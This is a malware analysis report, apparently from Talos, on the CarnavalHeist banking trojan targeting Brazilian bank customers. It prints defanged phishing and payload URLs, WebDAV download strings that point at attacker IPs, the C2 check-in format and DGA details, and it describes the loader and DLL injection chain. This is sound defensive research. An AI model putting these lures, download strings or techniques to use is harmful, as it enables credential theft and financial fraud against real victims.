We further assess that the current wave of activity has been ongoing since the beginning of February based on the volume and timeline of observable C2 domain activity, although we have observed related samples and variants that were uploaded to VirusTotal in November and December 2023, indicating that the malware has been in development since at least late 2023. As of May 2024, CarnavalHeist is still active, and our analysis remains ongoing as we continue to identify new samples.

Financial-themed spam as initial execution method

CarnavalHeist infection begins with a financially themed unsolicited email using a fake invoice as a lure to get the user to open a malicious URL.

The malicious link uses the IS.GD URL shortener service to redirect users to the first-stage payload. The URL usually looks similar to some of these examples:

https://is[.]gd/38qeon?0177551.5510
https://is[.]gd/ROnj3W?0808482.5176
https://is[.]gd/a4dpQP?000324780473.85375532000

This URL redirects the user to the server hosting the fake web page where the users are supposed to download their invoice. We have observed different domains being used in this step, but all contain references to “Nota Fiscal Eletrônica,” the Portuguese term for invoice.

Some of the domains we observed being used to host these pages are:

https://notafiscaleletronica[.]nf-e[.]pro/danfe/?notafiscal=00510242.500611
https://nota-fiscal[.]nfe-digital[.]top/nota-estadual/?notafiscal=00792011.977347
https://nfe-visualizer[.]app[.]br/notas/?notafiscal=000851113082.35493424000

The download target is the final link in this step, and it uses WebDAV to download the next-stage payload:

search:query=NotaFiscal.pdf&crumb=location:\\4[.]203[.]105[.]118@80\Documentos&displayname=Downloads
search:query=NotaFiscal.pdf&crumb=location:\\191[.]233[.]248[.]170@80\Documentos&displayname=Downloads

This command ends up downloading a LNK file, which then executes the next stage of the infection. The LNK file’s metadata illustrates a common method threat actors use to execute malicious scripts and commands.

The command above attempts to hide the malicious execution from the unsuspecting user. First, the text “Visualizacao indisponivel” (Portuguese for “view unavailable”) is written to a file, “NotaFiscal.pdf,” to the user’s Downloads directory. The PDF is then opened for viewing, meant to fool the user into thinking an actual PDF was downloaded, while another cmd.exe process is started minimized, and the malicious component is run.

We have also observed multiple MSI installer-based variants, whereby the MSI file replaces the role of the LNK file and subsequent batch file, picking up in the execution chain with a variant of the first-stage Python script. In many of the earlier variants, the actor’s Python scripts were less refined and used lower-level C-types and a more obvious invocation of “windll.kernel32” directly in the Python script to dynamically load downstream malicious DLLs, rather than through the more obfuscated tool offered through the “pythonmemorymodule” package seen in the execution chain of the newer samples.

Identifying the actors behind CarnavalHeist

Our analysis of the different samples for CarnavalHeist have exposed the user account used on the system where some of the samples were compiled, in addition to a GitHub account referenced in the MSI variants that appears to have been hosting the loader and banking trojan payloads at one point.

In examining the final payload, an assert statement within the code was flagged by the compiler and project metadata was exposed as a result. The assert we observed exposed the directory path “C:\Users\bert1m\Desktop\Meu Drive”, with “bert1m” being the active username during the payload’s compilation. The MSI variant also refers to a GitHub account “marianaxx0492494,” which was being used as a remote host for the files:

github[.]com/marianaxx0492494/update/raw/main/setup.msi
github[.]com/marianaxx0492494/update/raw/main/Execute_dll.zip

These were presumably a copy of the MSI variant itself as well a version of the loader DLL. However, at the time of our investigation, this user account had already been removed from GitHub, and we could not find verified samples of the files at those URLs.

While this evidence by itself is not enough to identify specific actors, we found additional evidence of the actors’ identity behind the development and operation of this malware campaign. While examining the WHOIS information for one of the domains hosting the initial infection, we noticed it exposed the full name and email address of the person registering the domain.

We can see the username in their email is similar to the username used in the project path we have observed inside the binary. Another important piece of information in this registry is the `ownerid`, which contains the CPF (“Cadastro de Pessoa Física” or “Natural Person Registry”) of the person. The CPF works as a national ID in Brazil.

By searching for this person name, we found a reference to a company where they were a partner, which lists part of their CPF above:

We also found previous companies they owned in the Brazilian state of Maranhão:

Another domain used to host the initial payload is also registered in Brazil and again exposes information about the owner.

For this person it was easier to find more information based on their CPF, as they have criminal records, according to the Brazilian judiciary service.

Based on this information, Talos assess with high confidence these two actors are behind the development and operation of the campaign distributing CarnavalHeist affecting Brazilian victims.

Analysis of batch file “a3.cmd” and Python loader

The file “a3.cmd” is a Windows batch file with a several layers of simple encoding and obfuscation that serves as a wrapper for installing Python on the target environment and subsequently executing a Python script that handles injecting the second-stage payload DLL.

This first layer is decoded to another shell script which downloads a Python interpreter from the official Python FTP server and installs to a malware-created folder.

After using the downloaded Python interpreter, the batch file executes an embedded base64-encoded Python script. Decoding the base64 string embedded in the Python command reveals the final component of the cascading commands to be a loader for injecting a malicious DLL.

The script checks the processor architecture from the registry key `HARDWARE\DESCRIPTION\System\CentralProcessor\0` and bails out if the processor name value is “Broadwell.” It then uses the function `lk()` as a domain generation algorithm (DGA) to generate a fully qualified domain (FQDN) under the BrazilSouth region in Azure, which will be used to download the malicious DLL from. We explain the process by which this domain is generated in a section below.

Once the correct FQDN has been generated, a TCP connection is opened. The script sends a UTF-8-encoded packet to the actor’s Azure server in the format below, where the victim’s hostname, Windows version name and processor architecture name are all passed as identifying markers:

`pyCodeV1 - *NEW* {ss.gethostname()} | {Windows Product Name} | {Processor Architecture Name}`

The server then sends a response back with a byte stream containing a DLL payload named “executor.dll,” a second-stage Python script that will load the DLL and additional Python modules used to load the DLL. This data object is then reserialized within the parent Python script and executed as the next stage through Python’s `exec()` command.

Using CodePy for dynamic DLL execution

The byte stream contains a handful of components that are passed to the `exec()` command to set up the downstream execution logic. On execution, CodePy first saves a copy of the previous Python script to the user’s public directory as “ps.txt”.

Next, the script unpacks the “executor.dll” PE file and loads the resulting bytes buffer of the DLL dynamically into memory through pythonmemorymodule’s `MemoryModule` class. Finally, the function entry point `Force` is called from `executor.dll` through the MemoryModule class function `get_proc_addr`. On execution, `Force` generates an up to 19-character randomized string using a similar character key string, as seen in the DGA function in the Python script.

It then selects a random directory from the system’s default user profile of the typical standard Windows folders. The injector then checks if the system is running a 32- or 64-bit operating system and copies “mshta.exe” from the proper 32-bit folder to the selected user folder, renamed with a random character string and an .exe extension.

Finally, the embedded payload, a UPX-packed banking trojan, is then extracted from a resource within executor.dll marked as “RcDLL”. It is another Delphi-based DLL, named "Access_PC_Client.dll" in many of the observed samples. The payload bytes are then written to a memory stream and injected into a spawned “mshta.exe” process.

Final payload: Banking trojan DLL

CarnavalHeist will attempt to steal the victim’s credentials for a variety of Brazilian financial institutions. This is accomplished through overlay attack methodologies, whereby an actor presents an overlaid window on top of the expected legitimate application or service.

Like other Brazilian banking trojans, the malware monitors window title strings for specific word and pattern matches. When a window title matches, the malware sets the window to invisible and replaces it with a bundled overlay image for the given organization. At the same time, a timer will attempt to open a new socket connection to an actor controlled C2 using another DGA function to create a separate. This DGA is distinct from the one used by the Python loader script, although this DGA also uses a server hosted on the BrazilSouth resource region on Azure.

CarnavalHeist possesses numerous capture capabilities, commonly associated with banking trojans, which are either executed automatically once a matched bank is detected, or by receiving a command from the C2.

The protocol is a customized version of a publicly available code for a Delphi Remote Access Client, which is the same protocol used by other banker families like Mekotio and Casbaneiro in the past. Luckily, these commands are not obfuscated and are exposed in the binary code. There is a single function processing all input from C2, and it translates to a series of IF/THEN structures for each command:

The code supports approximately 80 commands from the C2, including keyboard capture, screenshots, video capture and remote control. They also enable the attacker to trigger specific overlay attacks to steal the login information for the banking institutions while the user interacts with the fake login screens.

These commands sent from the C2 and responses from the malware are all sent unencrypted through a TCP connection on a random port. The commands and responses are usually enclosed in the tags shown in the code. One example of this is how the malware answers when the C2 responds to the initial connection attempt:

There are also functions present in the binary that deal with remote control capabilities using AnyDesk remote desktop, which allows the attacker to interact with the user machine during a banking session. Some of the commands accept additional parameters like an IP/Port to be used for the video connection or the keyboard/clipboard interaction in case of remote access.

CarnavalHeist can also capture and create QR codes on demand, which is used by many banks to allow users to log in and execute transactions. This enables the attacker to redirect transactions to accounts they control instead of the intended accounts the user intended.

Capturing mouse and keyboard events and their key translations would expose PINs and other similar tokens for these banks, while potentially being able to “pass through” the sign out to the legitimate service underneath the overlay, much like a skimmer on a credit card or ATM keypad.

CarnavalHeist C2 protocol and DGA analysis

CarnavalHeist uses different algorithms to generate the subdomains it uses to download payloads and communicate with its C2 servers. These subdomains are all hosted under the BrazilSouth availability zone in Azure at “{dga}[.]brazilsouth[.]cloudapp[.]azure[.]com”.

The DGA that generates the correct subdomains is contained within a function named `lk()` in the Python script.

It first gets the current date and weekday values from the Python datetime module and adds their values together to generate an integer value. This value is used as an index to retrieve a character out of the hardcoded string `{abcdefghijlmnopqrstuvxzwkyjlmnopqabcghjl}`.

Five possible subdomain string choices are then generated and hashed by the SHA1 algorithm, followed by more string manipulation until it is returned. A random entry from this list is then selected to generate the final FQDN.

Then, a random TCP port is generated by the function `ptV5()` following a similar algorithm using the dates as a seed, and these parameters are passed to the `connect()` Python function.

The algorithm used by the malicious DLL to generate the subdomain used for C2 communication is also based on the current date and time but adds additional seeds depending on which banks are currently being accessed by the victim, which could be either through a web browser or a custom banking desktop application used by some banks in Brazil. These seed values are single-hex bytes associated with each bank:

Target bank 1: 0x55
Secondary targeted banks: 0x56
All other financial institutions: 0x57

The DGA will then select a starting letter for the subdomain based on an array of non-ordered alpha characters like in the Python script. It then uses the integer representations of the current day of the week, month and year, as well as the current month and week of the year, to generate separate additional parts of the subdomain string through several arithmetic operations.

CarnavalHeist has likely been in active development since at least November of 2023, while significant in-the-wild activity first began in February 2024. Based on the information we had about the DGA domains and activities performed by the Python script, Talos discovered samples in VirusTotal and Talos telemetry dating back to November 2023.

Tracing the DGA domains from the Python script and the final payload in our DNS telemetry, we first observed in-the-wild activity on Feb. 20, 2024, with more consistent activity ramping up beginning on Feb. 11, 2024. Additional variants of the Python loader containing slight alterations to the DGA were observed further on in our investigation. Tracing all the potential domains from all the DGA variations, we can observe initial visible activity beginning in February with larger spikes in actor domain activity starting in late March to the present.

We assess that the actor(s) behind CarnavalHeist are of low-to-moderate sophistication. There are some aspects of the code and malware that hint at sophistication, whether borrowed or their own, but are then short circuited or made pointless by mistakes or odd choices elsewhere. For example, the DGA algorithm for some of the Python cradles goes through the trouble of generating a list of five different potential subdomains to be used on any given day. The list of subdomains is then referenced by Python’s random choice function, but the subdomain list is sliced in a way that only the last option is ever used. This is then corrected to use all choices in another version of the Python script we observed. The actor is worth monitoring, as the ability to incorporate complexity within their malware is more concerning than the initially observed missteps, which can always be corrected in future development iterations. The number of additional variants we observed also suggests that the author of CarnavalHeist is actively developing it.

Talos is continuing to monitor developments and analyze additional related samples and infrastructure to this actor and campaign.

MITRE ATT&CK

Tactic	Technique
Initial Access	T1566.001: Phishing: Spearphishing Attachment
Execution	T1059.001: Command and Scripting Interpreter: PowerShell
Execution	T1059.003: Command and Scripting Interpreter: Windows Command Shell
Execution	T1059.006: Command and Scripting Interpreter: Python
Persistence	T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation	T1055.001: Process Injection: Dynamic-link Library Injection
Defense Evasion	T1027.010: Obfuscated Files or Information: Command Obfuscation
Defense Evasion	T1027.012: Obfuscated Files or Information: LNK Icon Smuggling
Defense Evasion	T1027.009: Obfuscated Files or Information: Embedded Payloads
Defense Evasion	T1036.008: Masquerading: Masquerade File Type
Credential Access	T1056.001: Input Capture: Keylogging
Credential Access	T1056.002: Input Capture: GUI Input Capture
Discovery	T1010: Application Window Discovery
Discovery	T1082: System Information Discovery
Lateral Movement	T1570: Lateral Tool Transfer
Collection	T1113: Screen Capture
Collection	T1125: Video Capture
Command and Control	T1102: Web Service
Command and Control	T1102.002: Web Service: Bidirectional Communication
Command and Control	T1104: Multi-Stage Channels
Command and Control	T1105: Ingress Tool Transfer
Command and Control	T1568.002: Dynamic Resolution: Domain Generation Algorithms
Command and Control	T1571: Non-Standard Port
Exfiltration	T1020: Automated Exfiltration
Exfiltration	T1041: Exfiltration Over C2 Channel
Exfiltration	T1567: Exfiltration Over Web Service

Coverage

Ways our customers can detect and block this threat are listed below.